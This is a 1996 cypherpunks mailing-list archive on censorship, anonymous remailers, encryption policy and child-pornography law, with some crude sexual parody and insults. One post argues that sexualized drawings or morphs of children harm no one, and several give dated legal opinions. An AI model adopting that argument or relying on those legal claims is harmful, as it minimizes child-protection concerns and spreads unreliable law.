porn videos in the U.S. (maybe worse, as I'm sure the punishment could be death). Are the American and European actresses in such videos being harmed?) And the case of morphings, drawings, stories, etc., clearly involve no actual children, so the argument that children are harmed is empty. (Catherine MacKinnon and Andrea Dworkin, amongst others, have argued that "women as a class" are injured by pornography. I won't get into the issues of this here. Suffice it to say that if speech or nonviolent acts begin to be suppressed on the basis of "class action" cases, we're in a heap of trouble.) As to me argument that the images, stories, etc., are disgusting, amoral, inappropriate, etc., well, perhaps. But what is the legal and constitutional basis for restricting such things? Many opinions and actions are vile and disgusting, but are not illegal. Under what interpretation of the Constitution is the creation of a drawing depicting, say, a 7-year-old girl having sex with someone or something a criminal act? The obscenity laws? (And as to the obscenity laws, which part of "Congress shall make no law" did the readers of the First Amendment miss? I realize this is a longstanding topic of discussion, with various famous cases (Miller, Hustler, etc.), but it remains a mystery to me.) My point is this: For anyone who claims that "thoughtcrime" is something the Evil Empire specialized in, i.e., totalitarian communist regimes, look to the enforcement of laws about what can be viewed or accessed from the United States. Thougtcrime. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From jya at pipeline.com Tue Sep 10 18:17:29 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 09:17:29 +0800 Subject: QDY_nam Message-ID: <199609101618.QAA19360@pipe1.t2.usa.pipeline.com> Science, 30 August 1996: "Enforcing Coherent Evolution in Dissipative Quantum Dynamics" Cirac, Pellizzari, Zoller [Precis] The major obstacle to the preparation and manipulation of many-particle entangled states is decoherence due to the coupling of the system to the environment. A scheme to correct for the effects of decoherence and enforce coherent evolution in the system dynamics is described and illustrated for the particular case of the ion-trap quantum computer. The preparation and manipulation of N-particle entangled states is fundamental to the investigation of basic aspects of quantum mechanics and is the basis of applications such as quantum computation, teleportation, cryptography. and spectroscopy. The error correction schemes proposed so far have focused on preserving a given entangled state (memory errors). We introduce a method to correct for the effects of decoherence in the dynamical proccss of preparation and modification of entangled states (gate errors). We illustrate our scheme in the context of the ion-trap QC. ----- This 4-page paper is packed with equations. We will scan to JPEG for those without access to Science. Send us a blank message with the subject: QDY_nam We have to enlarge the fine-print originals to make readable images, usually in the 150kb range. Does anyone know of a program to do text and equations for easy- reading, easy access to a Web site? From bshantz at nwlink.com Tue Sep 10 18:42:38 1996 From: bshantz at nwlink.com (Brad Shantz) Date: Wed, 11 Sep 1996 09:42:38 +0800 Subject: Allo allo Message-ID: <199609102243.PAA28093@montana.nwlink.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Tue Sep 10 15:46:47 1996 Si_Druid wrote: >in the day' i used to write some low level crypts that were relatively > impossible to break... > they were also impossible to decrypt, which meant that the only way to > use them was to work forward.... Hmmmm. "relatively impossible" I feel so secure. > mostly i did password encryption schemes, this one working the best: I'm still partial to a one way hash. Brad -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjXv2a80j2q8tTgtAQFG7wQAlNFcTsiQ9q4xKXtquqgqxgE7NklvNpyc t6+ssuDutHfDzniclF0+exNH2VxbPPsAp8V+vhmcqPmZe4nyM7FGnDYJyQ+fFDA7 MOZf0xSDtVjnM+nXqdkKDK3/PnXTIWs7RqrN+UjJrxulUvw2AXXI0XieUU0K7YbC S7yi9Pv7sb4= =HqKR -----END PGP SIGNATURE----- From blancw at microsoft.com Tue Sep 10 19:16:06 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 11 Sep 1996 10:16:06 +0800 Subject: Child Porn as Thoughtcrime Message-ID: >From: tcmay at got.net > >My point is this: For anyone who claims that "thoughtcrime" is something >the Evil Empire specialized in, i.e., totalitarian communist regimes, look >to the enforcement of laws about what can be viewed or accessed from the >United States. Thougtcrime. >......................................................................... > > >Those laws obviously (to me) don't have all that much to do with legality nor >all that much with thought, either; but more with a government aiming to >"looking good" in front of an audience of voters, presenting an image of >being more moral, or "better-than-thou" - in front of other nations, etc.; >that is, to gain favor, and therefore political support, from the Citizen >Units by sounding like Mother Superior/fatherly figures who are going to look >after All The Little Children (tm), plus all the similarly weak & >dispossessed. > >This posturing gives all the un-selfconfident people someone to look up to, >even if they don't really get anything (their memories being too short to >notice the failed promises, lack of follow-through, and blatant >inconsistencies, not to mention the 'legal' crimes committed along the way). > >Many people seek after sympathy towards their feelings (present and/or future >pain) more than to be respected for the ability to think. I imagine this >develops into a reduced sympathy towards certain kinds of thought or towards >thinking per se, eventually, promoting a general atmosphere of tolerance for >offenses like "thoughtcrimes". > >And of course anyone who is free to think about anything & everything (who >could therefore potentially think about what everybody else has forgotten) >will seem dangerous to those who wish to appear to be in total, beneficent >control. > > .. >Blanc From declan at well.com Tue Sep 10 19:27:07 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 11 Sep 1996 10:27:07 +0800 Subject: China joins Singapore, Germany, .... Message-ID: I respectfully disagree. I spend most of my time going through sites like cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com, lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so on. Search engines and directories, in particular, are good chokepoints to block. Blocking 100 sites would certainly be significant to me -- as long as they're the right ones. Before the technical fixes, that is. -Declan Duncan writes: >You must admit >that a ban on 100 sites out of all the sites in the world is pretty >insignificant. The swamping effects of thousands and soon millions of sites >means the governments of the world won't even be able to evaluate a >significant percentage even if they want to. And all this *before* we apply >any of our technical fixes. > >DCF From vznuri at netcom.com Tue Sep 10 19:29:54 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 11 Sep 1996 10:29:54 +0800 Subject: O'Reilly supports secure web server standards Message-ID: <199609102320.QAA22357@netcom7.netcom.com> ------- Forwarded Message Date: Mon, 9 Sep 1996 18:47:29 -0700 From: Ellen Elias Subject: WebSite Professional Adds Digital Signature Technology For Release September 10, 1996 Ellen Elias (707)829-0515 ext. 322 elias at ora.com http://software.ora.com/ O'REILLY'S WEBSITE PROFESSIONAL ADDS SECURITY CAPABILITIES WITH TERISA'S NEW DIGITAL SIGNATURE TECHNOLOGY Sebastopol, CA--O'Reilly & Associates announced today that its WebSite Professional(TM) product will support Terisa Systems SecureWeb Documents(TM) (SWD) client. Terisa's software is provided as a browser plug-in that works with WebSite Professional's enhanced server security capabilities. Terisa Systems SecureWeb Documents client, a pioneering technology that enables Netscape browser users to send and receive verifiable Internet documents, is currently in beta and due to ship Q496. These documents are managed and stored on an enhanced security server such as WebSite Professional. SWD, which plugs into the Netscape browser, is based on the Secure HTTP (S-HTTP) cryptographic protocol standard, developed by Terisa Systems. WebSite Professional's built-in S-HTTP support on the server side works hand-in-glove with the SWD tool on the browser side. Together, they enable a Web administrator to provide Web documents which are safer than paper: readable only by specified users, from the right source, and exactly as provided. SecureWeb Documents enables a Web administrator to determine the exact visitors to a given site, with the visitors' permission. WebSite Professional is the first and only server currently supporting Terisa's standards-based digital signature technology for the World Wide Web. It is also one of the only leading servers to have built-in S-HTTP security. In contrast with SSL, which establishes security at the connection level, S-HTTP establishes security at the document level. S-HTTP provides a range of security options for documents, from digital signatures, as in SWD, to encryption. "SecureWeb Document and WebSite Professional together make electronic commerce, as well as general document serving, much more secure for Web server users and their site visitors," says Gina Blaber, Director of Software Products at O'Reilly. "Our long history with Terisa Systems underscores our mutual commitment to pushing the Web's capabilities forward. SWD and WebSite Professional are among the very few Web products that support S-HTTP, an important technology which greatly increases security standards on the Web." In July, 1996, the Forrester report on Web Security stated: "In the on-line world there is no sure way to know who is on the other end of the network. In the physical world, consumers use identification cards to prove their identity. There are two critical pieces of technology that solve this problem in the on-line world: 1) Digital Certificates and 2) Digital Signatures." WebSite Professional and Terisa's SWD combine to offer this critical technology in an affordable, useable package on the Windows platform. About WebSite Professional WebSite Professional, the second generation of the award-winning server software WebSite, runs on Windows NT and 95. Its ease of use, documentation, and features have been widely praised. In addition to cryptographic security, WebSite Pro includes support for a wide range of programming applications, Open Data Base Connectivity (ODBC)/SQL integration through Cold Fusion Standard, a server-side Java programming environment, three comprehensive books, and four software development kits. WebSite Professional also includes all the features of its predecessor WebSite 1.1, including the HotDog Standard HTML editor, WebView graphical document and link viewer, and the Mosaic browser. Both are products of O'Reilly & Associates, developed in cooperation with independent developer Robert Denny and Enterprise Integration Technologies (EIT), Inc./Verifone. WebSite Professional's list price is $499, with upgrade pricing for WebSite 1.1 customers available from O'Reilly for $99. O'Reilly Software Online (http://software.ora.com/) contains more information about WebSite Professional, as well as O'Reilly's other software products. About O'Reilly & Associates O'Reilly & Associates is recognized worldwide for its definitive books on the Internet and UNIX, and for its development of online content and software. O'Reilly developed the Global Network Navigator (GNN), a pioneering web-based publication which it sold to America Online in June, 1995. In addition to WebSite Professional and WebSite, the company's other software products include WebBoard, a web-based multi-threaded conferencing system, PolyForm, a web forms construction kit, and Statisphere, a web traffic analyzer (to be released this fall). About Terisa Systems Terisa Systems, Inc., based in Los Altos, Calif., was formed in 1995 to provide unified communications security solutions for the WWW. In early 1995, leading industry players such as America Online, CompuServe, IBM/Prodigy, Netscape, RSA and VeriFone/EIT forged a common commitment to WWW security by agreeing to pool both investment and technology in Terisa Systems. Terisa Systems' mission is to create tools and applications technologies that make secure Internet commerce possible. Terisa Systems' customers and partners are WWW-based application developers and vendors of commercial online services such as AOL, CompuServe/SPRY, Novell, OpenMarket, O'Reilly & Associates, and Process Software. The company is privately held. For more information on Terisa Systems, visit http://www.terisa.com. WebSite Professional, WebSite, WebBoard, PolyForm, and Statisphere are trademarks of O'Reilly & Associates, Inc. All other names are registered trademarks or trademarks of their respective companies. ### - ------- End of Forwarded Message ------- End of Forwarded Message From gbroiles at netbox.com Tue Sep 10 20:01:49 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 11 Sep 1996 11:01:49 +0800 Subject: shutting down anon.funet.fi -- tough case Message-ID: <2.2.32.19960911000616.00711a9c@pop.ricochet.net> At 05:22 PM 9/10/96 -0500, gene o'regon wrote: > the forced closing of the anonymous remailer from finland shows how >the law has to adapt to the internet. aside from the witch-hunt aspects of >the case ["they are the biggest porno distributor, etc."], there is real >substance to the claim that you can't just ignore blatant violoations of >coyright law. As I understand the situation, penet.fi wasn't forced to close but will apparently be forced (again) to compromise the anonymity of one of its users - and the operator, Johan Helsingus, chose to stop providing the service because he isn't able to protect the privacy of the users. It also might be confusing to think about anon.penet.fi as a single "case", since it's been the subject of frustration/attention from several directions - the church of scientology, the government of Singapore, and the recent UK newspaper article identifying it as a source of child porn. Further, I don't think there's been a real claim that penet or its operator(s) have violated any copyright at all; merely that they have frustrated the efforts of copyright holders to identify alleged infringers. I don't see how any service provider of even modest size can fail to "ignore blatant violations of copyright law" given the difficulty of figuring out who's got a right to make which data available. Even a relatively easy-to-spot infringement (say, an image with "Playmate of the Month" text visible) requires that some person who's familiar with Playboy view the image and come to the conclusion that an individual user probably doesn't have the right to make images available which were apparently produced by a well-known international publishing operation. The creation of a prescreening systen would require the development of protocols/systems which do not now exist, as well as burden the ability of users to communicate quickly. It's also expensive in terms of human time required, and likely to fall far short of its mission - e.g., people can perhaps spot Playboy centerfold images by their vertical-to-horizontal size ratio (I mean the image, not the model) plus the "Playmate of the month" text, and they can probably spot popular songs or images .. but matching two images or arbitrary selections of text is a difficult problem. Prescreening seems to require access (on the part of the screener) to a database of already copyrighted works, or a database of hashes (think of a hash as a digital fingerprint) of copyrighted works. The most likely scenario I can see would be for the Library of Congress (and equivalent foreign institutions) to maintain a database of all copyright works (yow!) in electronic format; and then to compare hashes of the work being screened to those works in the database. Obviously, such an effort - especially one which could respond in close-to-realtime - would be *incredibly expensive*. (The side effect - that we'd end up with an electronic version of every copyrighted work in the Library of Congress - is alluring. But if we had that the obvious step would be to make it Web-accessible, which would so radically transform the publishing business that copyright infringement wouldn't even be interesting any more.) Keeping a database of hashes online instead of a database of works is less useful because many of the hashes must be recomputed dynamically - e.g., such a system should be able to spot substrings or resizings of copyrighted works. And all of this ignores the possibility of fair use. So I guess my point is that the problem of "acting responsible with respect to letting others post copyright-protected works without permission" is a lot harder than it sounds like it ought to be. Good faith on the part of the ISP/remailer isn't even close to good enough. -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. From declan at well.com Tue Sep 10 20:18:23 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 11 Sep 1996 11:18:23 +0800 Subject: Crypto-plutocracy: Cypherpunks mentioned on cover of Oct Wired Message-ID: Splashed on the cover: "He was the most powerful banker in the world. "So why is he talking like a cypherpunk? "Walter Wriston, on the future of money. The Wired Interview. Inside: "An amazingly frnak Wired Interview with Walter Wriston about money, the economy, and the state in the Digital Era. By Thomas A. Bass." Wriston is the former chair and CEO of Citicorp/Citibank. Good interview. Though he does say equate crypto nonproliferation treaty to "like a nonproliferation treaty for atomic weapons" where "an international agency" could hold the keys. But it's not an important point to him, really. He's more interested in making money than talking politics. I call it crypto-plutocracy. -Declan PS: Check out my cyber-rights report card on Clinton v. Dole, page 95. Co-written with Brock. From chet at uconect.net Tue Sep 10 20:25:11 1996 From: chet at uconect.net (Chester Lee) Date: Wed, 11 Sep 1996 11:25:11 +0800 Subject: No Subject Message-ID: <199609101952.PAA00940@sun1.uconect.net> From blancw at microsoft.com Tue Sep 10 20:46:24 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 11 Sep 1996 11:46:24 +0800 Subject: PIN_hed Message-ID: >From: jya at pipeline.com [SMTP:jya at pipeline.com] > NCSA employs a number of ex-law enforcement officers who try to infiltrate hacker networks and solve problems before they start. "We track hackers by going underground to their sites," Tippett said. "We pretend to be their friends, but they fuck with our heads." .................................................................. Juno.com? .. >Blanc > > > > > > From frissell at panix.com Tue Sep 10 20:52:41 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 11 Sep 1996 11:52:41 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <2.2.32.19960911011744.00eb4a98@panix.com> At 04:26 PM 9/10/96 GMT, John Young wrote: > Mr David Bickford, the first British intelligence lawyer > to speak publicly in the UK, said at a conference in > Cambridge, 50 miles north-east of London, that there > "appears to be no justification at all for offshore bank > secrecy other than to protect the criminal". Keeping a client's secrets happens to be an ethical and legal requirement of the legal profession. It used also to be a requirement of the medical and banking professions. If it is good for lawyers to keep secrets why not doctors and banks? > Mr Bickford, who now runs an international legal > consultancy, said "endemic corruption" is caused by > offshore secrecy, and it is "difficult to see why it is > tolerated by any other than those with an unlawful > disposition". So we can retain the ability to say 'fuck you Jack' to fascist bastards such as yourself. > Mr Bickford added that the "justification is put forward > at all is an example of the overwhelming subversive > corruptive influence of organised crime which has managed > to magic a seemingly acceptable position out of the sheer > weight of its financial proceeds from narcotics, fraud, > extortion and other criminal enterprise". The definition of a totalitarian is one who wants total involvement in and control of the lives of those he rules. We're just trying to keep you and all the world's rulers from becoming totalitarians. Quite a public service. Our fathers used heavy artillery and bombers rather than offshore bank secrecy to discourage totalitarianism. Pretty mild of us. > Mr Raymond Kendall, secretary general of Interpol told > the 14th International Symposium on Economic Crime that > governments should commit more resources and step up > co-operation to tackle the growing problem of > international corruption. Economic crime = thought crime. DCF From remailer at cypherpunks.ca Tue Sep 10 21:01:51 1996 From: remailer at cypherpunks.ca (John Anonymous MacDonald) Date: Wed, 11 Sep 1996 12:01:51 +0800 Subject: LEOs running anon servers? In-Reply-To: Message-ID: <199609110102.SAA26681@abraham.cs.berkeley.edu> >> There >> are a number of anonymous remailers out in cyberspace, but it has been >> stated by a knowledgeable source that a number of them are being operated >> by law enforcement agencies (presumably to troll for criminal activity). A > > >Can someone verify/discredit/comment on this statement? Who is the >knowledgeable source? Sounds like you're the one trolling. From jimbell at pacifier.com Tue Sep 10 21:47:26 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 12:47:26 +0800 Subject: Guns Don't Kill People, IP Does Message-ID: <199609110201.TAA29131@mail.pacifier.com> At 10:37 AM 9/10/96 -0400, Mike Fletcher wrote: >> Sorry for my bad English, perhaps I got misunderstood. >> Would you run a WWW site where the (say there where some) >> terrorist who shot down (a wild assumtion too) the TWA plane >> claiming it was right and all people should fight 'evil >> America'. Because of your web site there are other bomb >> attacks in the US (or somewhere else, the country is not that >> important) (although it's of course impossible to proove that >> this bombings are 'inspired' by your web site). >> Would you support the freedom of speech in this way ? > > Call me crazy, but maybe if "terrorists" had a web page to >use to get out their particular message they wouldn't need to go out >and blow things up to get noticed (well, except for the ones in it >just for the sake of blowing things up). That's the RIGHT answer! Historically, governments have wanted to deny dissident-type people the freedom to spread word of their opposition to the rest of the population. This just made the problem worse, ensuring that they'd have to use violence to get the word out. The problem fed on itself until these people became "terrorists." The best way to stop this cycle is to allow these people to talk to us, and the web page is the modern form of talking. Be _very_ suspicious of anybody who wants to continue to isolate people he calls "terrorists." Jim Bell jimbell at pacifier.com From loki at infonex.com Tue Sep 10 21:56:35 1996 From: loki at infonex.com (Lance Cottrell) Date: Wed, 11 Sep 1996 12:56:35 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailerprotocols) In-Reply-To: <199609101730.KAA22130@netcom6.netcom.com> Message-ID: At 10:33 AM -0700 9/10/96, Bill Frantz wrote: >At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote: >>At 4:19 PM -0700 9/9/96, Bill Frantz wrote: >>>To paraphrase John Von Neumann, any system which uses reply blocks is in a >>>state of sin. By this I mean that if there is a chain pointing at you, a >>>sufficiently powerful attacker can walk down that chain and find you. >>> >>>Given that, I will join the state of sin by proposing a mechanism which >>>will allow Alice to receive a reply from Bob, but change her mind at any >>>time. The basic idea is to have a one-time reply block which either Bob or >>>Alice can send to. If Alice thinks that too much time has elapsed, and >>>powerful enemies are walking down her reply block chain, she can send >>>herself a reply and break the chain. (She might send a reply thru each >>>link in the chain to break all the links.) >> >>The reason the message is not resendable is that the remailers keeps track >>of the serial number of that header. If forced, the log of serial numbers >>could be deleted, and the operator would process the message. >> >>Unless you are assuming some key archived by each remailer for the reply >>block, then I think it will be possible to repair the chain. > >I was thinking of storing a reply-key in each remailer. The protocol might >go something like this (straw man proposal): > >(1) Alice picks n random ids (say 160 bits or so) and n random keys. >(2) Alice sends the combination to remailer[i], i=0,n-1. >(3) Alice builds a reply block which consists of the remailer return path, >each element encyphered with the appropriate key and sends it to Bob. >(4) When a remailer processes a reply block element, it removes it from the >reply block, looks up the id in its database, decrypts the address of the >next hop, removes the database element and forwards the message. > >If Alice becomes nervous, she sends n "replys" thru each remailer to cause >the return path to be destroyed. > It is a good idea, but it does involve another whole level of infrastructure. I am not at all sure that message pools are not a better system. Your suggestion requires The client to do a lot of work, and for the remailers to store many keys for indefinite periods. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From chuck at nova1.net Tue Sep 10 22:27:48 1996 From: chuck at nova1.net (Chuck Thompson) Date: Wed, 11 Sep 1996 13:27:48 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <1.5.4.32.19960911030546.006c224c@mail.nova-net.net> At 04:09 PM 9/10/96 -0700, you wrote: >>From: tcmay at got.net >> >>My point is this: For anyone who claims that "thoughtcrime" is something >>the Evil Empire specialized in, i.e., totalitarian communist regimes, look >>to the enforcement of laws about what can be viewed or accessed from the >>United States. Thougtcrime. >>......................................................................... >> >> >>Those laws obviously (to me) don't have all that much to do with legality nor >>all that much with thought, either; but more with a government aiming to >>"looking good" in front of an audience of voters, presenting an image of >>being more moral, or "better-than-thou" - in front of other nations, etc.; >>that is, to gain favor, and therefore political support, from the Citizen >>Units by sounding like Mother Superior/fatherly figures who are going to look >>after All The Little Children (tm), plus all the similarly weak & >>dispossessed. Let's see if I understand you correctly. The anti-child porn advocates are only interested in votes and positioning themselves as more moral or "better-than-thou"... >>This posturing gives all the un-selfconfident people someone to look up to, >>even if they don't really get anything (their memories being too short to >>notice the failed promises, lack of follow-through, and blatant >>inconsistencies, not to mention the 'legal' crimes committed along the way). in order to provide an icon for the "citizen units" to worship... >>Many people seek after sympathy towards their feelings (present and/or future >>pain) more than to be respected for the ability to think. because they are too stupid to think for themselves, and therefore are reduced to going on their intuition... >>I imagine this >>develops into a reduced sympathy towards certain kinds of thought or towards >>thinking per se, eventually, promoting a general atmosphere of tolerance for >>offenses like "thoughtcrimes". causing them to be unsympathetic to thinking? What in the devil are you trying to say? Maybe I'm one of those stupid citizen units. I just don't get it - I'd like to, but I don't. How about rephrasing your comments so that us average citizen units can understand your wisdom. >> >>And of course anyone who is free to think about anything & everything (who >>could therefore potentially think about what everybody else has forgotten) >>will seem dangerous to those who wish to appear to be in total, beneficent >>control. If there is logic to the wind-up, it escapes me. It seems to me that the appearance of being in total control (dictatorship) is the last thing any politician in this country would want to be seen (seen being the operative word) as attempting. Is this message spoofed from that juno kid? Regards, Chuck Thompson From dlv at bwalk.dm.com Tue Sep 10 22:42:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 13:42:07 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > I didn't call for your "expulsion." No one has been expelled in four years > of the list's existence. However Tim has been complaining about my postings to various people I know and respect. (I stopped respecting Tim years ago.) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at eff.org Tue Sep 10 23:14:29 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 14:14:29 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: I'll try to respond to some of Tim's questions. Keep in mind it's late; I'm about to go to sleep; I don't have my references here. I welcome corrections. -Declan On Tue, 10 Sep 1996, Timothy C. May wrote: > Q: Is a drawing of a child engaging in a sexual act an illegal item? Under the original Hatch bill, yes. Certainly under the revised one. Of course, Hatch's proposal goes even farther. There's no "sex act" requirement. Judy Krug from the ALA testified about this, opposing Bruce Taylor. > Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old > illegal? Even under the original Hatch bill, yes. > Q: Is writing a story about a child having sex illegal? Probably not. > Q: Is a collage of images of little girls (or boys, one presumes) in > swimsuits, with apparent salacious intent, illegal? Under the Knox decision, yes. (Dancing girls in leotards are verboten.) > Q: Is accessing a Web site having nude or sexually-related images of > children who are of legal sexual age in the site's country--but not in the > accessor's country--illegal? If you're in the U.S. and are accessing photos from Sweden, yes. But child porn laws have been harmonized, so this may be an unlikely scenario. There is also a treaty I talk about in my August Internet Underground cover story: Not so, says Bruce Taylor, the chief architect of the CDA and a professional cyber-scaremonger. The former Federal porn-prosecutor believes that "not all censorship is bad." "Foreign countries have an obligation to restrict obscenity and child pornography on the Internet by the treaty of 1911," says Taylor. "It's an agreement between the states to cooperate and to use international laws to prosecute obscenity." And to Taylor, books and copies of Penthouse magazine can be obscene. > Q: Is it legal to have photographs of one's own children in a nude state? > (E.g., playing in a backyard pool, at the beach, etc.) Does it become > illegal to let others see these photographs? How about putting them on a > Web site? You can be harassed by police for it -- reference the Cambridge case linked to from http://joc.mit.edu/. I think, though I don't have cites, that other parents have been prosecuted for this. > Q: Is a crime committed if a teenaged girls takes a photograph of _herself_ > and shows it to others? To adults? Or if she writes a salacious story about > herself or her friends? Or if she just invents it all? Not sure. Perhaps others can help? > (And as to the obscenity laws, which part of "Congress shall make no law" > did the readers of the First Amendment miss? I realize this is a > longstanding topic of discussion, with various famous cases (Miller, > Hustler, etc.), but it remains a mystery to me.) Ah. "Obscenity" isn't speech! // declan at eff.org // I do not represent the EFF // declan at well.com // From dlv at bwalk.dm.com Tue Sep 10 23:14:58 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 14:14:58 +0800 Subject: Harry Browne a cryptographer In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu> Message-ID: Will Day writes: > > Browne said he formed his attitude toward government when he entered the > >U.S. Army three years after high school and became a cryptographer. > > The article didn't say anything more about his cryto past.. ... but we know his attitude toward gubment. Instead of advocating violent overthrow of all gubments, the fucking statist is running for president. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at eff.org Tue Sep 10 23:25:10 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 14:25:10 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: >From fight-censorship archives... -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // ADDITIONAL ANSWER: Because "child pornography" as defined in the governing Supreme Court case (Ferber) sweeps far more broadly than "obscenity" ever did (to the point that even scholars who have supported controls on the latter attacked what the Supreme Court did with the former). For example, although the issues were not resolved, the case revealed that some members of the Supreme Court believe that medical doctors, anthropologists, journalists covering wars or working for the National Geographic, or legislators working on new censorship legislation might all be constitutionally prosecuted for possessing any photographic images of naked children. Therefore, we need to be extremely careful about any casual acceptance of the proposition that "Of course, child pornography can be banned." What we actually mean is, "Of course, one can outlaw the use of children in obscene performances." Without wanting to sound too legalistic about all this, if we don't stay alert we are going to find that a significant part of the suppression work sought to be done by "indecency" can be done by "child pornography." ******* Professor Eric M. Freedman Hofstra University School of Law Hempstead, N.Y. 11550 Tel. (516)-463-5167 Fax (516)-560-7676 LAWEMF at Vaxc.Hofstra.edu ******** From shabbir at vtw.org Wed Sep 11 00:30:14 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Wed, 11 Sep 1996 15:30:14 +0800 Subject: ALERT: Call the Commerce committee! The White House is fighting us! (9/10/96) Message-ID: <199609110442.AAA10980@panix3.panix.com> ======================================================================== SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE OFFICES ARE RECEIVING 'LOTS OF CALLS' MAKE A CALL TO THE COMMERCE COMMITTEE September 11, 1996 Please widely redistribute this document with this banner intact until September 30, 1996 ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now Background / What To Expect This Week Description of S.1726, Pro-CODE Bill Chronology of Pro-Crypto Legislation For More Information / Supporting Organizations ________________________________________________________________________ THE LATEST NEWS Sometimes things work out better than imagined. This was the feeling tonight as I waded through my email from people all over the country that called the commerce committee. This was the feeling as I heard from visitors to one Senator's office who, while waiting for a few minutes in the lobby, listened to the receptionist take two quick calls from netizens calling about the bill. Receptionist, cutting the caller off: "S.1726? Yes, I'll pass that along to the Senator, thanks. We've been getting a lot of calls." Another netizen emailed us saying that he also called his Representative. It turns out this Rep. has some friends who have co-sponsored HR 3011, the House version of Pro-CODE. The calls and elevated publicity from this phone campaign have convinced him to consider co-sponsoring HR 3011. This is great, but our success has mobilized the anti-crypto forces into action as well. The Clinton Administration, who has long opposed the right of citizens to use non-Clipper encryption, has begun working behind the scenes to make sure that the vote on Pro-CODE (S.1726) never happens. To have the Senate Commerce committee go on record that encryption exports should be loosened, against the will of the Administration, would be an embarrassment to the White House. They have begun pushing hard to pressure Democratic Commerce Committee members to put the brakes on the bill, and do everything they can to prevent the vote this Thursday. To see the business community, the industry, and the public line up the Administration would be extremely hard to take and still seem credible. It's crucial that we continue to make noise and ring those phones. By pulling enough favors with members of the Senate Commerce Committee, it's possible that the White House could prevent this vote from happening. WE MUST NOT LET THAT HAPPEN. Appropriately forward this to everyone you know until the expiration listed above. Go to work, bug your neighbor in the cubicle or office next to you. Have they called yet? Bug them until they do. Call the rest of the members you haven't gotten around to yet. And don't forget to sign the petition at http://www.crypto.com/petition/ ! [Rest of alert is the same from last time] ________________________________________________________________________ WHAT YOU CAN DO NOW It's crucial that you call the Commerce committee members below and urge them to pass S.1726 out of committee without amendments. (This is also known as a "clean" bill.) Any opportunity for amendments (even if they are good) opens us up to the possibility of hostile amendments that could restrict the use of encryption even further than today's abysmal state. It could even prohibit the use of encryption without Clipper Chip-like key 'escrow' technology, which includes built-in surveillance and monitoring functionality. 1. Call/Fax the members of the Senate Commerce committee and urge them to pass S.1726 out of committee "cleanly". Do not use email, as it is not likely to be looked at in time to make a difference for the markup on September 12th. Use the sample communique and directory listing below to make it a simple TWO MINUTE task. 2. Sign the petition to support strong encryption at http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and others who have also signed. 3. Between now and Wed. September 12, it is crucial that you call all these members of Congress. P ST Name and Address Phone Fax = == ======================== ============== ============== D SC Hollings, Ernest F. 1-202-224-6121 1-202-224-4293 D MA Kerry, John F. 1-202-224-2742 1-202-224-8525 D HI Inouye, Daniel K. 1-202-224-3934 1-202-224-6747 D KY Ford, Wendell H. 1-202-224-4343 1-202-224-0046 D WV Rockefeller, John D. 1-202-224-6472 1-202-224-7665 D LA Breaux, John B. 1-202-224-4623 1-202-228-2577 D NV Bryan, Richard H. 1-202-224-6244 1-202-224-1867 D ND Dorgan, Byron L. 